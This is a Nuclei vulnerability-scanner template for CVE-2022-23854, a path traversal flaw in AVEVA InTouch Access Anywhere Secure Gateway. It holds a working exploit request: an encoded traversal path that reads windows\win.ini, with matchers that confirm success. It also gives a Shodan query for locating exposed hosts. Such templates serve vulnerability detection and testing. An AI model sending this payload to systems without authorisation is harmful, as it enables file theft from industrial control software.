nuclei-templates/http/cves/2022/CVE-2022-23854.yaml

51 lines
1.5 KiB
YAML

id: CVE-2022-23854
info:
name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
author: For3stCo1d
severity: high
description: |
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
reference:
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
- https://www.aveva.com
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-23854
cwe-id: CWE-23
cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:*
epss-score: 0.9685
metadata:
max-request: 1
shodan-query: http.html:"InTouch Access Anywhere"
verified: true
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
http:
- method: GET
path:
- "{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"
matchers-condition: and
matchers:
- type: word
words:
- 'for 16-bit app support'
- 'extensions'
condition: and
- type: word
part: header
words:
- EricomSecureGateway
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15